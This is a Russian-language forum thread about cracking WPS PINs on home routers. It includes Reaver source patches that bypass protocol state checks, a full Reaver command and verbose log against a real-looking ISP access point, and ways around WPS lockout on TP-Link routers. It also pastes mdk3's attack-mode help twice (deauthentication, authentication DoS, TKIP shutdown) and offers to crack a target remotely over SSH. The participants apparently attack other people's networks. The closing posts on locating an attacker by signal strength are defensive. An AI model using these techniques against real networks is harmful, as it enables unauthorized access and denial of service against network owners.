Там точно pin пустой, а почему key не показывает - надо включать более подробный лог - в файле wpa_debug.c int wpa_debug_level = MSG_INFO; int wpa_debug_show_keys = 0; поменять на int wpa_debug_level = 0; int wpa_debug_show_keys = 1; Upd: Похоже, что когда E-Hash1==E-Hash2, то первым делом надо проверять на пустой pin
[!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin "�p��p�" [!] WPS transaction failed (code: 0x03), re-trying last pin Ошибка сегментирования
Видимо там, где происходит получение строки из get_static_p1(), нужно делать её дубликат, т.е. обернуть в strdup(). Интересное наблюдение!
Spoiler root@kali:~/reaver/src# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -p "" -N Reaver v1.5.3 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft [+] Switching wlan0mon to channel 6 [+] Waiting for beacon from D4:76:EA:xx:xx:xx [+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 WPS: A new PIN configured (timeout=0) WPS: UUID - hexdump(len=16): [NULL] WPS: PIN - hexdump_ascii(len=0): WPS: Selected registrar information changed WPS: Internal Registrar selected (pbc=0) WPS: sel_reg_union WPS: set_ie WPS: cb_set_sel_reg WPS: Enter wps_cg_set_sel_reg WPS: Leave wps_cg_set_sel_reg early WPS: return from wps_selected_registrar_changed [+] Trying pin "" [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request WPS: Processing received message (len=539 op_code=4) WPS: Received WSC_MSG WPS: attr type=0x104a len=1 ................................. [+] Received M5 message WPS: Processing received message (len=158 op_code=4) WPS: Received WSC_MSG WPS: attr type=0x104a len=1 WPS: attr type=0x1022 len=1 WPS: attr type=0x1039 len=16 WPS: attr type=0x1018 len=112 WPS: attr type=0x1005 len=8 WPS: Parsed WSC_MSG WPS: Received M7 WPS: Unexpected state (12) for receiving M7 WPS: WPS_CONTINUE, Freeing Last Message WPS: WPS_CONTINUE, Saving Last Message WPS: returning [+] Received M7 message WPS: Building Message WSC_NACK WPS: * Version WPS: * Message Type (14) WPS: * Enrollee Nonce WPS: * Registrar Nonce WPS: * Configuration Error (0) [+] Sending WSC NACK WPS: Building Message WSC_NACK WPS: * Version WPS: * Message Type (14) WPS: * Enrollee Nonce WPS: * Registrar Nonce WPS: * Configuration Error (0) [+] Sending WSC NACK [+] Pin cracked in 15 seconds [+] WPS PIN: '' [+] Nothing done, nothing to save. WPS: Full PIN information revealed and negotiation failed WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 41 44 53 4c 20 4d Внес свежие изменения, пересобрал. Пароль не сдает.
А попробуйте в файле wps_registrar.c заменить строчку if (wps->state != RECV_M7) { на if (0) { Авось поможет. Постоянные повторы принятых пакетов - это может быть и с адаптером связано.
Почитал тему, возник вопрос, есть ли решение обойти wps lock на tp link (С0:4A:00) При обычном переборе возникает Code: warning: detected ap rate limiting, waiting 60 seconds before re-checking Пробовал mdk3,выдает Code: mdk3 device seems to be invulnerable . Если увел время между перебором или еще что-то, толк от этого будет? wifislax 4.12. (722n)
Некоторые tp-link выставляют флаг locked, но wps продолжает работать. В reaver для этой ситуации есть флаг -L. Если же все методы (хендшейк в т.ч.) окажутся безуспешными, могу попробовать его раскрутить, после того, как разлочится. Для этого нужен ssh сервер, и устойчивый сигнал с/до цели. По времени - примерно как reaver'ом.
Насколько я понял из вашей с ним переписки, у вас нет доступа к вебке таких роутеров? Если помогу организовать такой доступ, дело шустрее пойдет? Только сейчас заметил, то в теме про роутерскан эти точки уже изучаются...
Учитывая, что относительно недавно была выложена последняя ночная сборка RS, я переключился на другое. Но писать в ту тему смысл есть, возможно кто-нибудь из нашей команды реализует.
Я тут только что прошелся как раз новой сборкой по своему региону и обнаружил несколько десятков таких точек. Они не совсем корректно парсятся. Запостил в ветку роутерскана. Сейчас добавлю туда еще список таких же точек на случай, если та исчезнет.
Есть подозрение, что кто-то пытается ломануть мой wi-fi, ибо периодически сеть падает и тут же появляется, судя по индикации на андрюше. Стало быть, ловит хендшейк. Вопрос! Как вычислить негодяя?
Вот значит вы как, да? Теперь значит, негодяи? Отследить очень тяжело, даже с помощью спецоборудования. Процесс деаутентификации очень короток(слишком мало времени для лоцирования), остальное время "негодяй" слушает(принимает) а не говорит(передаёт). Хотя, если вы профессионально играете в "Охоту на лиc" .. всё возможно. Другой случай, если у вас длительно пытаются получить хендшейк(а не получается) например с помощью MDK3, замусоривая эфир. Тогда проще. Есть время лоцировать источник.
Я же шутю! Сам такой же негодяй . Просто интересно стало, как повернуть процесс вспять и попытаться вычислить "лису". Тем самым и себя обезопасить. Кстати, в commview для wifi, помню, есть такая функция, когда прога рисует схему взаимодействия узлов на основе анализа мониторинга пакетов. Только вот мой текущий адаптер она не поддерживает. Может в кали есть что-то подобное? Да, роутер оказался в порядке и кондеры живые. Какая-то ошибка в конфиге. Дефолтнул, загрузил сохраненный конфиг - опять сигнал пляшет. Снова дефолт, ручками прописываю настройки - все, полет нормальный.
Spoiler MDK 3.0 v6 - "Yeah, well, whatever" by ASPj of k2wrlz, using the osdep library from aircrack-ng And with lots of help from the great aircrack-ng community: Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape, telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik THANK YOU! MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. IMPORTANT: It is your responsibility to make sure you have permission from the network owner before running MDK against it. This code is licenced under the GPLv2 MDK USAGE: mdk3 <interface> <test_mode> [test_options] Try mdk3 --fullhelp for all test options Try mdk3 --help <test_mode> for info about one test only TEST MODES: b - Beacon Flood Mode Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers! a - Authentication DoS mode Sends authentication frames to all APs found in range. Too much clients freeze or reset some APs. p - Basic probing and ESSID Bruteforce mode Probes AP and check for answer, useful for checking if SSID has been correctly decloaked or if AP is in your adaptors sending range SSID Bruteforcing is also possible with this test mode. d - Deauthentication / Disassociation Amok Mode Kicks everybody found from AP m - Michael shutdown exploitation (TKIP) Cancels all traffic continuously x - 802.1X tests w - WIDS/WIPS Confusion Confuse/Abuse Intrusion Detection and Prevention Systems f - MAC filter bruteforce mode This test uses a list of known client MAC Adresses and tries to authenticate them to the given AP while dynamically changing its response timeout for best performance. It currently works only on APs who deny an open authentication request properly g - WPA Downgrade test deauthenticates Stations and APs sending WPA encrypted packets. With this test you can check if the sysadmin will try setting his network to WEP or disable encryption. MDK 3.0 v6 - "Yeah, well, whatever" by ASPj of k2wrlz, using the osdep library from aircrack-ng And with lots of help from the great aircrack-ng community: Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape, telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik THANK YOU! MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. IMPORTANT: It is your responsibility to make sure you have permission from the network owner before running MDK against it. This code is licenced under the GPLv2 MDK USAGE: mdk3 <interface> <test_mode> [test_options] Try mdk3 --fullhelp for all test options Try mdk3 --help <test_mode> for info about one test only TEST MODES: b - Beacon Flood Mode Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers! a - Authentication DoS mode Sends authentication frames to all APs found in range. Too much clients freeze or reset some APs. p - Basic probing and ESSID Bruteforce mode Probes AP and check for answer, useful for checking if SSID has been correctly decloaked or if AP is in your adaptors sending range SSID Bruteforcing is also possible with this test mode. d - Deauthentication / Disassociation Amok Mode Kicks everybody found from AP m - Michael shutdown exploitation (TKIP) Cancels all traffic continuously x - 802.1X tests w - WIDS/WIPS Confusion Confuse/Abuse Intrusion Detection and Prevention Systems f - MAC filter bruteforce mode This test uses a list of known client MAC Adresses and tries to authenticate them to the given AP while dynamically changing its response timeout for best performance. It currently works only on APs who deny an open authentication request properly g - WPA Downgrade test deauthenticates Stations and APs sending WPA encrypted packets. With this test you can check if the sysadmin will try setting his network to WEP or disable encryption. b - Beacon Flood Mode Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers! OPTIONS: -n <ssid> Use SSID <ssid> instead of randomly generated ones -f <filename> Read SSIDs from file -v <filename> Read MACs and SSIDs from file. See example file! -d Show station as Ad-Hoc -w Set WEP bit (Generates encrypted networks) -g Show station as 54 Mbit -t Show station using WPA TKIP encryption -a Show station using WPA AES encryption -m Use valid accesspoint MAC from OUI database -h Hop to channel where AP is spoofed This makes the test more effective against some devices/drivers But it reduces packet rate due to channel hopping. -c <chan> Fake an AP on channel <chan>. If you want your card to hop on this channel, you have to set -h option, too! -s <pps> Set speed in packets per second (Default: 50) a - Authentication DoS mode Sends authentication frames to all APs found in range. Too much clients freeze or reset almost every AP. OPTIONS: -a <ap_mac> Only test the specified AP -m Use valid client MAC from OUI database -c Do NOT check for test being successful -i <ap_mac> Perform intelligent test on AP (-a and -c will be ignored) This test connects clients to the AP and reinjects sniffed data to keep them alive -s <pps> Set speed in packets per second (Default: unlimited) p - Basic probing and ESSID Bruteforce mode Probes AP and check for answer, useful for checking if SSID has been correctly decloaked or if AP is in your adaptors sending range Use -f and -t option to enable SSID Bruteforcing. OPTIONS: -e <ssid> Tell mdk3 which SSID to probe for -f <filename> Read lines from file for bruteforcing hidden SSIDs -t <bssid> Set MAC adress of target AP -s <pps> Set speed (Default: unlimited, in Bruteforce mode: 300) -b <character set> Use full Bruteforce mode (recommended for short SSIDs only!) Use this switch only to show its help screen. d - Deauthentication / Disassociation Amok Mode Kicks everybody found from AP OPTIONS: -w <filename> Read file containing MACs not to care about (Whitelist mode) -b <filename> Read file containing MACs to run test on (Blacklist Mode) -s <pps> Set speed in packets per second (Default: unlimited) -c [chan,chan,chan,...] Enable channel hopping. Without providing any channels, mdk3 will hop an all 14 b/g channels. Channel will be changed every 5 seconds. m - Michael shutdown exploitation (TKIP) Cancels all traffic continuously -t <bssid> Set Mac address of target AP -w <seconds> Seconds between bursts (Default: 10) -n <ppb> Set packets per burst (Default: 70) -j Use the new TKIP QoS-Exploit Needs just a few packets to shut AP down! -s <pps> Set speed (Default: 400) x - 802.1X tests 0 - EAPOL Start packet flooding -n <ssid> Use SSID <ssid> -t <bssid> Set MAC address of target AP -w <WPA type> Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA) -u <unicast cipher> Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP) -m <multicast cipher> Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP) -s <pps> Set speed (Default: 400) 1 - EAPOL Logoff test -t <bssid> Set MAC address of target AP -c <bssid> Set MAC address of target STA -s <pps> Set speed (Default: 400) w - WIDS/WIPS/WDS Confusion Confuses a WDS with multi-authenticated clients which messes up routing tables -e <SSID> SSID of target WDS network -c [chan,chan,chan...] Use channel hopping -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts) f - MAC filter bruteforce mode This test uses a list of known client MAC Adresses and tries to authenticate them to the given AP while dynamically changing its response timeout for best performance. It currently works only on APs who deny an open authentication request properly -t <bssid> Target BSSID -m <mac> Set the MAC adress range to use (3 bytes, i.e. 00:12:34) Without -m, the internal database will be used -f <mac> Set the MAC adress to begin bruteforcing with (Note: You can't use -f and -m at the same time) g - WPA Downgrade test deauthenticates Stations and APs sending WPA encrypted packets. With this test you can check if the sysadmin will try setting his network to WEP or disable encryption. mdk3 will let WEP and unencrypted clients work, so if the sysadmin simply thinks "WPA is broken" he sure isn't the right one for this job. (this can/should be combined with social engineering) -t <bssid> Target network Прослушиваем эфир в мониторе, видим подозрительную активность связанную с вашим BSSID(чужой(ие) клиент(ы)), ходим с ноутбуком по подъезду с прицелом на уровень сигнала этого клиента(ов) и находим максимум сигнала перед одной из хат. Если это фейк-точка(с вашим BSSID) то сложнее, можно запутатся в уровнях сигнала вашей точки и паразитной. Придётся начать от противного, отойти подальше от своего местоположения, и намеренно искать максимум "своего" сигнала, при этом стараясь НЕ приближаться к себе(к вашей точке). Слепой поиск(ощупывание по кругу). Лучше всего в этот момент выключить вашу AP и просто поискать(по уровню сигнала) точку с вашим "BSSID". Это и будет "лиса". Что то в этом роде, если нет направленных антенн(только ноут с "всенаправленой" антенной в крышке монитора). А вообще, по идее можно программу написать - которая бы автоматизировала такой процесс наблюдения, а если ещё и узконаправленную антенну прикрутить!
Ну вообще, да) логично, я уж думал, там что-то сверх запутанное с использованием спец.средств.спасибо!
Спец.средства, в этом случае(просто название узкоспециализированного оборудования) - это остронаправленная антенна+заточенное для локации оборудование. Им может быть и обычный ноутбук с соответствующим ПО.